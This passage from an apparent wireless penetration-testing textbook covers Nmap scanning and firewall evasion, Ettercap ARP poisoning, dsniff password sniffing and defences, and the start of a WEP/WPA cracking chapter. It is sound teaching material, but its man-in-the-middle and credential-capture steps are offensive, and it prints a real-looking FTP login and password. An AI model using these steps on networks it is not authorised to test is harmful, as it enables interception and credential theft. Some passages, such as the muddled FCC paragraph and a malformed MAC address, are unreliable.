Mention the most famous confidential attacks. 
Mention the most famous credential attacks. 
Mention the most famous authentication attacks. 


CHAPTER 3 


Wireless Information Gathering and 
Footprinting 


Introduction 


We hope you enjoyed reading the previous chapter and found it instructive, as it contained a 
wealth of information. In this chapter, we will discuss how to scan wireless networks for 
information, as well as several wireless scanning technologies and how they can be used for both 
good and negative purposes. 


You can ask or start wondering how difficult it is to scan for wireless networks. That is 
something that everybody can do! Yes, but what if the SSID is not visible? Are you able to find 
hidden wireless networks? The average user is unlikely to be aware of the existence of concealed 
wireless networks. 


You might also wonder why a hidden wireless network is so necessary. You may believe that 
keeping your identity hidden from others is a useful security precaution. Yes, it certainly is! 
Hidden wireless networks, however, can be used for harmful and other illicit purposes. 


Consider the following scenario: you are a security consultant for a company. Some files are 
missing or have been modified after business hours by a user who does not have physical access 
after office hours or remote access, according to a co-worker. You check the timestamps of the 
updated files and the files that were deleted after 2 a.m. and the name of the user who logged in 
and performed the changes. This user now claims that they did nothing wrong. Your co-worker 
tells you later that day that they witnessed the user put up a wireless access point or router in 
their cubicle. You inquire with your employer about the possibility of searching the user’s 
workspace due to a security concern. After exploring the area, you discover a Wi-Fi access point 
installed beneath the desk. This is clearly not a good situation! Anyone can now connect to the 
company’s network and access network shares and servers from anywhere within a wireless 
range. 


Structure 


In this chapter, we will discuss the following topics: 


• Footprinting 
• Wireless network discovery 
• Wireless scanning 
• Sniffing wireless networks 
• Identifying your targets 
• Protecting yourself from attacks 


Objectives 


You will learn how to scan wireless networks for information in this chapter, as well as see two 
different forms of wireless scanning and how they function. You will also learn how to use 
Ettercap to sniff wireless networks using ARP poisoning and how to use dsniff to gather login 
details. During a wireless penetration test, you will also be able to identify your targets. Finally, 
you will learn a variety of ways to defend yourself against these attacks. 


Footprinting 


Footprinting is the process of gathering information about a client's network to construct a 
profile based on the data. For a penetration tester, it is critical to gather this information within 
the agreed scope, in a professional manner, and to handle anything confidential that is collected 
with care. 


Footprinting normally entails two stages of reconnaissance. The first stage is to obtain data from 
the target to define the scope of the network range. The following are the most used tools for this: 

• Nslookup 
• Whois 


In the next stage, you should collect the following information: 


• Contact names, phone numbers, and e-mail addresses 
• Each location and branch office 
• Company security policies 


Sending an e-mail or calling one of the employees and undertaking a social engineering method 
to determine how much information they are prepared to share would yield even better results. 
Then, look at the areas where security awareness training may be better. 


Wireless network discovery 


The best network applications recommended by network and security administrators will be 
covered in the next section. These tools can detect rogue hardware, software license violations, 
and even outages or performance concerns. The applications we selected are diverse and 
dependable. Even though we will only discuss two network discovery tools, we will provide 
some additional applications that we believe will benefit you and your company. 


Nmap 


Network Mapper (Nmap) is a well-known port scanner and network discovery tool. It is 
compatible with all major operating systems. Figure 3.1 serves as an example: 




Figure 3.1: Nmap 


Please visit the Nmap website for more information on Nmap. 


Nmap has a lot of command choices, and we might not recall all of them off the top of our heads. 
In the end, it is all about knowing your commands and which ones to use in which scenarios. As 
a pentester, you will need to be able to use most of these tools effectively. The following are 
some examples of them: 


• Operating system and version detection: As illustrated in Figure 3.2, these commands 
will return results for the operating system and software versions: 




Figure 3.2: Nmap -A command 


The following are some commands: 


o nmap -A 192.168.1.7: The operating system, service versions, and traceroute 
results will all be displayed with this command. 


o nmap -v -A 192.168.1.7: During the scan, this command will display more 
detailed information, including the operating system, service versions, and 
traceroute output. 


o nmap -O 192.168.1.7: Only the operating system will be detected with this 
command, as shown in Figure 3.3: 


Figure 3.3: Nmap -O command 


o If you add --osscan-guess, Nmap will guess the operating system more aggressively 
when it has no exact fingerprint match, as shown in Figure 3.4: 


Figure 3.4: Nmap -O --osscan-guess command 


o nmap -A -iL /tmp/hosts.txt: This command will look for the operating system 
and service version information, as well as do a traceroute, for every host or 
network listed in the text file, as shown in Figure 3.5: 


Figure 3.5: hosts.txt 


Refer to Figure 3.6: 


Figure 3.6: Nmap -A -iL command 


• Service scan: These commands will display information about the host's services and 
ports, as well as whether the host or network is protected by a firewall. Figure 3.7 shows 
this: 




Figure 3.7: Nmap -sV command 


The following are some commands: 


o nmap -sV 192.168.1.7: This command probes the open ports to identify the 
services and versions running on them. 


o nmap -sA 192.168.1.7: This command maps firewall rules with an ACK scan. It 
sends TCP ACK packets to the target; a port that answers with RST is unfiltered 
(reachable through the firewall), while a port that does not answer, or returns an 
ICMP unreachable error, is filtered. An ACK scan never tells you whether a port is 
open; it only shows whether a stateless packet filter is blocking unsolicited 
packets, as shown in Figure 3.8: 


Figure 3.8: Nmap -sA command 


• Bypassing firewall filters: These options scan a firewall-protected host or network 
that does not answer a normal ping. Their success still depends on the firewall filters 
in use. Figure 3.9 demonstrates the technique: 


Figure 3.9: Nmap -PN command 


The following are some commands: 


o nmap -Pn 192.168.1.7 (older versions spell it -PN): The host will be scanned as 
though it were online, skipping host discovery. This is useful when a firewall drops 
the ping probes so the host cannot be reached with ping. 

o nmap -PS 192.168.1.7: This uses a TCP SYN ping for host discovery, sent to port 
80 unless you list ports (for example, -PS22,443). 

o nmap -PA 192.168.1.7: This uses a TCP ACK ping for host discovery, which can 
slip past stateless filters that only block SYN packets. 


• Scanning for firewall vulnerabilities: These scans exploit a detail of the TCP 
specification (RFC 793) rather than a bug: a closed port must answer any packet that lacks 
SYN, RST, or ACK with a RST, while an open port silently drops it. Because none of the 
probes is a SYN, a stateless packet filter that only blocks incoming SYNs lets them through, 
as shown in Figure 3.10: 


nmap -sN 192.168.1.7 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-14 17:51 EST 
Nmap scan report for cil0-hplp-23 (192.168.1.7) 
Host is up (0.00015s latency). 
All 1000 scanned ports on cil0-hplp-23 (192.168.1.7) are closed 
MAC Address: 34:F6:4B:BD:768:27 (Intel Corporate) 

Nmap done: 1 IP address (1 host up) scanned in 1.84 seconds 


Figure 3.10: Nmap -sN command 
The following are some commands: 


o nmap -sN 192.168.1.7: This is a null scan command. Because the null scan sets no 
TCP flags, it can be used to get around a non-stateful firewall or packet filter. A 
port that replies with RST is closed; one that stays silent is open or filtered. 


o nmap -sF 192.168.1.7: This is a FIN scan command. Only the TCP FIN bit is set. 
An open port ignores the FIN packet, whereas a closed port replies with an RST 
packet, which is how Nmap tells open and closed ports apart. 


o nmap -sX 192.168.1.7: This is an Xmas scan command, so called because the packet 
is lit up like a Christmas tree: it sets the FIN, PSH, and URG flags. It reveals open 
and closed ports by the same RST-or-silence rule. Note that all three scans fail 
against Windows and some other systems that answer every such probe with RST, 
so every port appears closed. 


• Packet fragments: To make it harder for packet filters, intrusion detection systems, and 
firewalls to identify your scan, the -f option splits each probe's TCP header across several 
small IP fragments. If you want to run a stealthier scan on a network without raising a 
flag, you will need these commands. As an example, consider Figure 3.11: 


o nmap -sS -p 80 -f 192.168.1.7: This command does a fragmented TCP SYN scan of 
port 80 on 192.168.1.7 and may slip past filters that only inspect the first fragment. 
Please keep in mind that whether it evades detection depends on the setup and 
policies of the firewall or IDS, many of which reassemble fragments before 
inspection. 


Figure 3.11: Packet fragment command 


• Firewall decoys: You can use this option to mix your scan with probes that appear to 
come from other hosts. An IDS and the network administrator will see several scanning 
sources and cannot tell which one is real if the decoys are chosen well (they should be 
live hosts, or the target may simply be SYN-flooded by your scan). A sample command is 
as follows: 


o nmap -n 192.168.1.7 -D 192.168.1.110: This command scans a host without 
issuing DNS requests (-n), and it adds a decoy at 192.168.1.110, so the target also 
sees probes that appear to come from 192.168.1.110 rather than only from the 
Kali Linux host. Refer to Figure 3.12: 


Figure 3.12: Firewall decoys command 


Zenmap 


Zenmap is a graphical frontend for Nmap that runs on multiple platforms. It simplifies the use of 
Nmap and includes prepared instructions for running scans on the fly. 


Refer to Figure 3.13: 


Zenmap 
Target: 192.168.1.7    Profile: Intense scan 
Command: nmap -T4 -A -v 192.168.1.7 

NSE: Loaded ... scripts for scanning. 
NSE: Script Pre-scanning. 
Initiating NSE at 01:18 
Completed NSE at 01:18, 0.01s elapsed 
Initiating NSE at 01:18 
Completed NSE at 01:18, 0.00s elapsed 
Initiating NSE at 01:18 
Completed NSE at 01:18, 0.00s elapsed 
Initiating Parallel DNS resolution of 1 host. at 01:18 
Completed Parallel DNS resolution of 1 host. at 01:18, 0.01s elapsed 
Initiating SYN Stealth Scan at 01:18 
Scanning cil0-hplp-23 (192.168.1.7) [1000 ports] 
Discovered open port 139/tcp on 192.168.1.7 
Discovered open port 135/tcp on 192.168.1.7 
Discovered open port 443/tcp on 192.168.1.7 
Discovered open port 808/tcp on 192.168.1.7 
Discovered open port 912/tcp on 192.168.1.7 
Discovered open port 5557/tcp on 192.168.1.7 
Discovered open port 902/tcp on 192.168.1.7 
Completed SYN Stealth Scan at 01:18, 0.08s elapsed (1000 total ports) 
Initiating Service scan at 01:18 


Figure 3.13: Zenmap 
Please visit https://nmap.org/zenmap/ for more information on Zenmap. 


Wireless scanning 


Wireless clients are continuously looking for access points to connect to. 802.11 radios 
operate in the 2.4 GHz band and in the 5 GHz band (up to 5.85 GHz). Passive and active 
scanning are the only two approaches available. By default, 802.11 radios perform both kinds 
of scan on all channels authorized by the country's regulatory rules. 


Transmitting on these bands is regulated: operating outside the permitted channels or power 
limits without an FCC permit or license can result in a significant fine even for a single day 
of operation. You might wonder who the FCC is. The Federal Communications Commission 
(FCC) oversees and regulates the US telecommunications industry, which includes the internet. 
Why might this be a cause for concern? The purpose of the internet is for everyone to have 
access to it without discrimination, blocking, censorship, or network throttling. To recapitulate, 
the FCC is proposing new internet rules and contracts that would allow internet service providers 
to charge a premium or sell a paid-to-use service that slows down your internet if you do not 
pay extra. Before doing any local broadcasts or scans, please consult your country's radio 
regulator. 


Passive scanning 


A passive scan transmits nothing. The client's radio tunes to a channel and listens for beacon 
frames, which every access point broadcasts about ten times a second (the default beacon interval 
is roughly 100 ms), and for probe responses addressed to other stations; it then moves to the next 
channel and repeats. Because clients depend on these beacons to find and join access points, 
passive scanning is always enabled.


Active scanning 


Active scanning is only performed on channels permitted by government regulations. It is enabled 
by default, but it can be disabled in the profile or settings of the wireless adapter. During an 
active scan the client's radio sends probe request frames, either naming a specific SSID or carrying 
a null (broadcast) SSID, to prompt nearby access points to answer with probe responses. In other 
words, it is the client that actively seeks out access points and listens for their replies, as shown in 
Figure 3.14. Access points configured to hide their SSID ignore broadcast probe requests and only 
answer probes that name their SSID, which the client must send in the clear; this is why hiding an 
SSID offers little protection. 

Figure 3.14: Active scanning 


How does scanning work? 


To scan channels other than the one it is currently using, a radio must retune to each of them in 
turn. A client (or an access point that performs off-channel scans, for example for rogue detection) 
hops through the channel list about once a second, covering different channel ranges on each 
pass until every channel has been visited, as shown in Figure 3.15: 


Figure 3.15: RF channels (U.S. 2.4 GHz frequency spectrum, amplitude versus channel) 


The radio dwells on each channel for roughly 25-30 milliseconds before leaving it. Scans are 
timed so that they do not collide with the transmission of the radio's own beacons. Once the 
channel change is complete, probe requests are sent. Keep in mind that if voice, video or other 
significant data traffic is detected, the scan frequency is reduced so that scanning does not disrupt 
it.
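To make the passive side of this concrete, here is an added example (written for this edition; it is not airodump-ng, Kismet or any other tool's code) that decodes 802.11 beacon frames the way a passive scanner does, pulling the BSSID, SSID, channel and encryption type out of each management frame. The three beacon frames it parses are constructed by hand inside the script, reusing the BSSID DC:EF:09:59:B1:1F and SSID Wireless Lab of the lab access point used later in this book, so it runs offline without a wireless card:

```python
"""Decode 802.11 beacon frames the way a passive scanner does.

Added example, not airodump-ng or Kismet code. A passive scanner never
transmits: it sits on a channel and reads the beacons every access point
broadcasts (about ten per second), taking the BSSID from the MAC header and
the SSID, channel and security configuration from the tagged information
elements (IEs). The beacon frames below are constructed, not captured.
"""
import struct

MGMT_HDR_LEN = 24       # frame control, duration, addr1, addr2, addr3, sequence control
BEACON_FIXED_LEN = 12   # timestamp (8) + beacon interval (2) + capability info (2)
CAP_PRIVACY = 0x0010    # capability bit set when the BSS requires encryption
CIPHER = {2: "TKIP", 4: "CCMP"}
AKM = {1: "802.1X", 2: "PSK", 8: "SAE"}
RSN_OUI, WPA_OUI = b"\x00\x0f\xac", b"\x00\x50\xf2"
WPA_OUI_TYPE = WPA_OUI + b"\x01"          # vendor-specific IE (tag 221) carrying WPA v1


def ie(tag: int, data: bytes) -> bytes:
    return bytes([tag, len(data)]) + data


def build_beacon(bssid: bytes, ssid: str, channel: int, rsn: bytes = b"", privacy=False) -> bytes:
    """Construct a beacon: management header, fixed fields, then SSID/rates/DS/RSN IEs."""
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    cap = 0x0001 | (CAP_PRIVACY if (privacy or rsn) else 0)        # ESS, plus privacy if encrypted
    fixed = struct.pack("<QHH", 0, 100, cap)                        # interval 100 TU (about 102 ms)
    ies = ie(0, ssid.encode()) + ie(1, bytes([0x82, 0x84, 0x8B, 0x96])) + ie(3, bytes([channel]))
    return header + fixed + ies + (ie(48, rsn) if rsn else b"")


def parse_ies(buf: bytes) -> dict:
    """Walk the tag/length/value list; reject a truncated element rather than misparse it."""
    ies, i = {}, 0
    while i + 2 <= len(buf):
        tag, length = buf[i], buf[i + 1]
        value = buf[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated IE")
        ies.setdefault(tag, []).append(value)
        i += 2 + length
    return ies


def parse_rsn(data: bytes, oui: bytes = RSN_OUI) -> dict:
    """RSN/WPA IE body: version, group cipher, pairwise ciphers, AKM suites (suite = OUI + type)."""
    def suite(s, table):
        return table.get(s[3], s.hex()) if s[:3] == oui else s.hex()
    pairwise_n = struct.unpack_from("<H", data, 6)[0]
    pairwise = [data[8 + 4 * k:12 + 4 * k] for k in range(pairwise_n)]
    off = 8 + 4 * pairwise_n
    akm_n = struct.unpack_from("<H", data, off)[0]
    akms = [data[off + 2 + 4 * k:off + 6 + 4 * k] for k in range(akm_n)]
    return {"group": suite(data[2:6], CIPHER),
            "pairwise": [suite(s, CIPHER) for s in pairwise],
            "akm": [suite(s, AKM) for s in akms]}


def parse_beacon(frame: bytes) -> dict:
    """Return what airodump-ng shows per network: BSSID, ESSID, channel, ENC, CIPHER, AUTH."""
    if len(frame) < MGMT_HDR_LEN + BEACON_FIXED_LEN or frame[0] != 0x80:
        raise ValueError("not a beacon frame")
    cap = struct.unpack_from("<H", frame, MGMT_HDR_LEN + 10)[0]
    ies = parse_ies(frame[MGMT_HDR_LEN + BEACON_FIXED_LEN:])
    ssid_raw = ies.get(0, [b""])[0]
    info = {"bssid": ":".join(f"{b:02x}" for b in frame[16:22]),     # addr3 = BSSID in a beacon
            "ssid": ssid_raw.decode("utf-8", "replace") if ssid_raw else "<hidden>",
            "channel": ies[3][0][0] if 3 in ies else None}
    wpa = [v for v in ies.get(221, []) if v.startswith(WPA_OUI_TYPE)]
    if 48 in ies:                                        # RSN IE: WPA2, or WPA3 when the AKM is SAE
        rsn = parse_rsn(ies[48][0])
        info.update(enc="WPA3" if "SAE" in rsn["akm"] else "WPA2", cipher=rsn["pairwise"], auth=rsn["akm"])
    elif wpa:                                            # WPA v1 uses the same layout under OUI 00:50:f2
        w = parse_rsn(wpa[0][4:], oui=WPA_OUI)
        info.update(enc="WPA", cipher=w["pairwise"], auth=w["akm"])
    elif cap & CAP_PRIVACY:                              # privacy bit but no RSN/WPA IE: WEP
        info.update(enc="WEP", cipher=["WEP"], auth=[])
    else:
        info.update(enc="OPN", cipher=[], auth=[])
    return info


# Constructed frames: the lab AP (WPA2-PSK/CCMP, ch 11), a hidden WEP AP (ch 1), an open AP (ch 6)
RSN_WPA2_PSK_CCMP = bytes.fromhex("0100000fac040100000fac040100000fac020000")
SAMPLE_BEACONS = [
    build_beacon(bytes.fromhex("DCEF0959B11F"), "Wireless Lab", 11, rsn=RSN_WPA2_PSK_CCMP),
    build_beacon(bytes.fromhex("0011AA000001"), "", 1, privacy=True),
    build_beacon(bytes.fromhex("0011AA000002"), "Coffee-Guest", 6),
]


def scan(frames):
    return [parse_beacon(f) for f in frames]


if __name__ == "__main__":
    for net in scan(SAMPLE_BEACONS):
        print(net)
```

The hidden network shows up as `<hidden>` with its BSSID and channel intact, which is the point made above: a passive listener still sees that the network exists, and the first client to connect will reveal the name in its probe request.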


Sniffing wireless networks 


Can we really smell wireless networks? It sounds funny, but with the right tools and equipment 
you can! Wireless sniffing is an eavesdropping technique in which a program captures the frames 
travelling over a wireless network. Network "stumbling" (passively cataloguing the access points 
in range, as wardriving tools do) is less intrusive than sniffing, which records the traffic itself. 
Network administrators use wireless sniffing to diagnose network and protocol problems on a 
wireless network.


Both wired and wireless connections can be monitored and sniffed. Because wireless networks 
communicate via radio, sniffing them is considerably easier: there is no cable to tap. An attacker 
could sit in a car outside a business and sniff its wireless network for sensitive information to use 
for personal advantage, notoriety or money. 


Networks divide data into frames, the link-layer units that 802.11 radios actually transmit; the IP 
packets carrying application data travel inside these frames. An attacker may target the frames 
themselves, the packets they carry, or both. 


From management frames alone an attacker can discover hidden wireless networks in the area 
and, if a network is not using a current wireless encryption standard, gain unauthorized access. 
Network administrators use the same techniques to debug network faults.


The Wireshark application 


Wireshark is a packet analyzer that is both free and open source. It is used to troubleshoot and 
analyze networks. It captures and displays network packets in detail. Wireshark is used by 
network and security managers to diagnose network and security issues. 


Years ago, there were a variety of tools accessible, all of which were somewhat costly to use. 
Wireshark has changed that by making itself available to the public for free. Wireshark is one of 
the most powerful open-source packet analyzers currently available. 


Wireshark has several uses. It will be used by network administrators to discover and 
troubleshoot network issues. Security issues can be investigated by network security engineers. 
Protocol implementations can be debugged by developers. Users can gain a good understanding 
of how network protocols work and how an attacker could potentially compromise them. 


Wireshark is particularly useful in the real world for viewing packets in real time to diagnose web 
application issues, connection problems such as a failing TCP three-way handshake, and 
authentication failures, and for auditing. Wireshark shows where each packet came from, where it 
is going and what it is for.


You could, for example, see if one user is using more network traffic than others. During 
business hours, this user could be downloading or watching YouTube videos in large quantities. 
You can reduce that user’s bandwidth so that the network is not slowed down for everyone else. 


Wireshark is a network protocol analyzer that runs on Windows, macOS and Linux. For more 
information on features and support, go to https://www.wireshark.org/. Wireshark is preinstalled 
on Kali Linux, so you will not have to install it there; on other operating systems you may need to 
install it yourself. Other network protocol analyzers include the SolarWinds Deep Packet 
Inspection and Analysis tool, NetFlow Analyzer and PRTG Network Monitor.


Ettercap 
Ettercap performs man-in-the-middle attacks, impersonating a router or server towards its victims. 


An attacker could use Ettercap for the following purposes: 


• To manipulate data in transit 
• To gather passwords for protocols such as FTP, HTTP, POP and SSHv1 
• To present forged SSL certificates in HTTPS sessions 


In this Ettercap demonstration we will position our Kali Linux system as the man-in-the-middle 
by ARP spoofing. Let us get started! 


1. Open a bash terminal and type ettercap -G to launch Ettercap in graphical mode, as shown 
in Figure 3.16. Select wlan0 as the Primary Interface, then accept the settings: 


Figure 3.16: Ettercap (ettercap 0.8.3.1, copyright 2001-2020 Ettercap Development Team) 
2. Select Hosts, then Scan for hosts from the drop-down menu, as shown in Figure 3.17: 


Figure 3.17: Scan for hosts 


3. Click on Hosts, then on Hosts list, as shown in Figure 3.18. The list shows each discovered 
host's IP address, MAC address and description; in this lab it contains the router, 
192.168.1.1: 


Figure 3.18: Host list 


4. Select the router's IP address and click Add to Target 1. If you want to target a second host 
as well (typically the victim client, or another server), select its IP address from the list and 
click Add to Target 2, as shown in Figure 3.19: 


Figure 3.19: Add targets 


If you do not choose anything, the entire subnet will be ARP-poisoned. This should not be 
executed on a production network! The router we will be using for this example has the IP 
address 192.168.1.1. 


5. Next, go to Mitm and then ARP poisoning, as shown in Figure 3.20: 


Figure 3.20: ARP poisoning 


6. In the dialog, check Sniff remote connections and leave Only poison one-way unchecked, so 
that both directions of the traffic pass through our machine, as shown in Figure 3.21: 


Figure 3.21: Sniff remote connections 


7. Click on Start and then on Start sniffing, as shown in Figure 3.22: 


Figure 3.22: Start sniffing 


With the subnet trapped in a man-in-the-middle position, the attacker only needs to apply a filter 
or plugin to the traffic passing through. Filters can be taken from Ettercap's plugins or written 
from scratch; common attacks at this stage include DNS spoofing, rewriting FTP banners and 
prompts, and SSH downgrade attacks, and the end user sees nothing unusual. On the defensive 
side, a network administrator can use Wireshark to spot that one MAC address is answering ARP 
requests for the gateway's IP address and track the attacker down from there. As a rule, do not 
rely on default or automatic security settings: enforce the strongest configuration the equipment 
supports and educate employees on security best practices.
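Here is an added example of the defensive check just described, as a network administrator might script it rather than eyeball it in Wireshark (example code written for this edition, not part of Ettercap or Wireshark). It takes the ARP reply fields Wireshark displays (time, sender IP, sender MAC, target IP), flags any IP address whose MAC changes, and then names the MAC that answers for several IP addresses at once, which is what a poisoner sitting between a client and the gateway looks like. The five ARP replies and all addresses in them are constructed for the example:

```python
"""Flag ARP cache poisoning in a stream of ARP replies.

Added example for this section; not Ettercap's or Wireshark's code. Input is a
list of constructed ARP reply records (time, sender IP, sender MAC, target IP),
the same fields Wireshark shows for an ARP "is-at" frame. An ARP poisoner
answers for an address it does not own, so one IP suddenly maps to a second
MAC, and the attacker's MAC ends up claiming several IPs (both ends of a MITM).
"""
from collections import defaultdict

# Constructed sample traffic. Gateway 192.168.1.1 really is aa:bb:cc:00:00:01,
# host .14 really is aa:bb:cc:00:00:14; de:ad:be:ef:00:99 is the poisoner.
SAMPLE_ARP_REPLIES = [
    ("12:44:58", "192.168.1.1",  "aa:bb:cc:00:00:01", "192.168.1.14"),
    ("12:44:59", "192.168.1.14", "aa:bb:cc:00:00:14", "192.168.1.1"),
    ("12:45:00", "192.168.1.1",  "aa:bb:cc:00:00:01", "192.168.1.20"),
    ("12:45:01", "192.168.1.1",  "de:ad:be:ef:00:99", "192.168.1.14"),
    ("12:45:02", "192.168.1.14", "de:ad:be:ef:00:99", "192.168.1.1"),
]


def detect_arp_poisoning(replies, trusted=None):
    """Return one alert string per ARP reply that changes the MAC claimed for an IP.

    trusted: optional static {ip: mac} table (e.g. the gateway). A reply that
    contradicts it is flagged even if it is the first reply seen for that IP.
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    claimed = defaultdict(set)               # ip -> MACs that have claimed it so far
    for ip, mac in trusted.items():
        claimed[ip].add(mac)
    alerts = []
    for ts, ip, mac, target in replies:
        mac = mac.lower()
        if ip in trusted and mac != trusted[ip]:
            alerts.append(f"{ts} {ip} claimed by {mac}, static entry is {trusted[ip]} (reply to {target})")
        elif claimed[ip] and mac not in claimed[ip]:
            alerts.append(f"{ts} {ip} moved from {sorted(claimed[ip])} to {mac} (reply to {target})")
        claimed[ip].add(mac)
    return alerts


def suspect_macs(replies):
    """MACs that answered for two or more different IPs: the poisoner's hardware address."""
    ips_by_mac = defaultdict(set)
    for _, ip, mac, _ in replies:
        ips_by_mac[mac.lower()].add(ip)
    return {mac for mac, ips in ips_by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    gateway = {"192.168.1.1": "aa:bb:cc:00:00:01"}
    for line in detect_arp_poisoning(SAMPLE_ARP_REPLIES, trusted=gateway):
        print("ALERT", line)
    print("suspect MAC(s):", suspect_macs(SAMPLE_ARP_REPLIES))
```

Static entries for the gateway are what make the check reliable on a quiet network: without them, the first reply the monitor sees is trusted blindly, which is exactly the window a poisoner that starts before the monitor exploits.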


dsniff 


dsniff is a password sniffer that understands a wide range of network protocols, including Telnet, 
FTP, SMTP, POP3, IMAP, HTTP, CVS, Citrix, SMB, Oracle and many others. Wireshark shows 
you everything about each packet; dsniff goes straight for the usernames and passwords. You can 
choose the interface to listen on and save the results to a file you can read later. Let us look at a 
few examples of how to use dsniff, as shown in Figure 3.23: 


Version: 2.4 
Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] 
              [-f services] [-t trigger[,...]] [-r|-w savefile] 
              [expression] 


Figure 3.23: dsniff tool 
Perform the following steps: 


1. Open a new Terminal window. 


2. Type the following command: dsniff -i wlan0. The -i option selects the network interface 
to listen on, here wlan0, as shown in Figure 3.24: 


dsniff: listening on wlan0 


Figure 3.24: dsniff -i wlan0 command 


3. From a second terminal, sign in to a service using any of the cleartext protocols mentioned 
earlier. Figure 3.25 shows an FTP login to 45.88.198.202: 


Connected to 45.88.198.202. 
220 FTP Server ready. 
Name (45.88.198.202:kali): u595688373 
331 Password required for u595688373 
Password: 
230 User u595688373 logged in 
Remote system type is UNIX. 
Using binary mode to transfer files. 
ftp> quit 
221 Goodbye. 


Figure 3.25: FTP protocol 


4. When you switch back to the dsniff terminal, you will see that dsniff has captured your 
login credentials, as shown in Figure 3.26 (this particular capture was taken on eth0; the 
output on wlan0 is identical): 


dsniff: listening on eth0 


12/17/21 12:45:00 tcp 192.168.1.14.48102 -> 45.88.198.202.21 (ftp) 
USER u595688373 
PASS 0x4186GAhmed 


Figure 3.26: dsniff output 


If anyone signs in over an unencrypted protocol, dsniff will capture the credentials. For this 
reason it is strongly recommended to always use encryption when it is available: use the most 
recent TLS version your server and clients support and a properly issued certificate with an RSA 
key of at least 2,048 bits (or an equivalent ECDSA key). If you are configuring a server, also 
consider moving it off the default port. That does not stop a targeted attacker, who will find the 
service with a port scan, but it does cut down the volume of automated scans and opportunistic 
attacks in the wild.


Suppose you wanted to use dsniff to capture passwords from another computer on the local LAN 
rather than from your own traffic. No problem: the arpspoof tool, which ships with dsniff, lets 
your attacking machine pose as the default gateway, placing it in a man-in-the-middle position. 
For this attack to work you must enable IP forwarding on the attacking machine, so that the 
victim's traffic is relayed on to the real gateway and the connection keeps working while you 
sniff it.


Identifying your targets 


As a penetration tester, it is important to understand exactly who and what your targets are. There 
is far more than workstations to consider: servers, smartphones, tablets and network hardware 
may all be in scope for the penetration test. Knowing whether software and operating-system 
patches have been applied is extremely important, because unpatched devices are how 
unauthorized access to systems happens, especially in a production environment. 


Tools like Nmap and Zenmap can scan a whole network. Although this is a quick way to obtain 
information such as operating system and software versions, fingerprinting is not always accurate. 
Depending on the scenario, it is sometimes better to go to each device and system and check what 
is actually running on it. Asking the client for system documentation and a hardware inventory is 
very useful if they can provide it.


Protecting yourself from attacks 


Whatever the situation, we always need to know how to protect ourselves from the threats that 
could occur, whether they come from inside or outside the network, and understand how an 
individual or an organization could be affected. There are several ways to protect yourself from 
the attacks in this chapter: 


• Protection against Nmap and Zenmap: 
  ◦ Create custom firewall rules and access lists 
  ◦ Deploy an IDS that monitors network traffic 24/7 
  ◦ Block or filter ICMP pings (this only defeats the default host-discovery step; a scanner that 
    skips ping probes will still find open ports) 


• Protection against wireless scanning: 
  ◦ Configure the latest wireless encryption algorithm your equipment supports 
  ◦ Configure MAC filtering rules 
  ◦ Turn off or hide the SSID broadcast 
  ◦ Turn off UPnP support 
  Note that MAC filtering and a hidden SSID only raise the attacker's effort: both the SSID and 
  the MAC addresses of associated clients appear in the clear in frames, so they can be sniffed 
  and spoofed. 


• Protection against sniffing wireless networks: 
  ◦ Use SSH and HTTPS instead of Telnet and HTTP 
  ◦ Connect using a VPN service 
  ◦ Connect only to trusted wireless networks 

Conclusion 


In this chapter, you learned how to scan wireless networks for information, saw the two kinds of 
wireless scanning and how they work. You saw how to sniff wireless networks after ARP 
poisoning with Ettercap and how to capture login credentials with dsniff. We also discussed how 
to identify your targets during a wireless penetration test. 


Finally, you learned several ways to protect yourself from these attacks. Keeping an attacker's 
mindset is important because it opens your eyes to further security threats that could affect you as 
an individual or as a company. Always connect to trusted wireless networks, use encryption when 
it is available, and use a VPN when travelling. 


Now you are ready to move on to Chapter 4, Wireless Vulnerability Research. 


Questions 


1. What is footprinting? 
2. Name the most popular wireless network discovery tools. 
3. What are the types of wireless scanning? 
4. How do you protect yourself from wireless scanning? 
5. Name the common network protocol analyzer tools. 


CHAPTER 4 
Wireless Vulnerability Research 


Introduction 


In this chapter you will learn how to plan an attack, how to crack WEP, WPA and WPA2 wireless 
networks, and how to spoof a MAC address to gain unauthorized access to a network. You will 
also learn how to protect yourself from these threats. The chapter contains hands-on, step-by-step 
instructions for Kali Linux. Remember that you will only be able to follow the cracking portion 
of this chapter if you have one of the wireless cards or adapters listed towards the end of 
Chapter 1, Wireless Penetration Testing Lab Setup. 


Before we start, there are some things that you need to know before we crack any wireless 
networks: 


• Cracking any wireless network without authorization is illegal 


• If you are caught without authorization, you will face the consequences under the law in 
your jurisdiction 


• Only practise these methods on your own network 


Structure 


In this chapter, we will discuss the following topics: 


• Planning an attack 
• Wireless password cracking 
• Spoofing your MAC address 
• Protecting yourself from attacks 


Objectives 


In this chapter, you will learn how to put a plan for an attack. Next, you will learn several 
methods for an attack. Then, you will learn detailed information on WEP, WPA, and WPA2 
encryption. Finally, you will learn several ways to reduce the risk of a wireless attack. 


Planning an attack 


Before we run any wireless scans or try to crack any wireless encryption, the very first thing we 
must do is plan the attack. We must make sure we have everything needed to run a wireless 
penetration test and ask ourselves as many questions as possible up front, so that we do not hit 
obstacles along the way. Let us start with a list of requirements and the steps we will take to 
crack a wireless network. 


Wireless attack 


Right here, we have a listing of what is necessary to conduct a complete wireless attack: 


• A compatible wireless adapter: Note that it must support packet injection. 
• The Kali Linux operating system: All our security tools are preinstalled. 
• Pen and paper to take notes: This will help us to keep organized. 


The plan for attacking wireless networks 


Listed here are the actions to plan a wireless attack: 


1. Scan for a list of wireless networks in the area. 
2. Take note of the BSSID, Channel number, and encryption. 
3. List several attack methods that you will use to attack: 
1. Airodump 
2. Aircrack 
3. Dictionary attack 
4. Default logins 
5. Password guessing 
4. Proceed with each method. 
5. Record both successful and unsuccessful results. 


6. Try again. 


Wireless password cracking 


There are various ways to crack wireless encryption. Here we cover the most common methods 
used against WEP, WPA and WPA2 networks. In the following sections we describe each 
encryption scheme in detail and then demonstrate how to crack it. Let us begin! 


WEP encryption 


Even though WEP was shown to be broken as early as 2000, it is still in use, and access points 
are still shipped with WEP available as an option. 


WEP has several cryptographic flaws, identified by Walker, Arbaugh, Fluhrer, Martin, Shamir, 
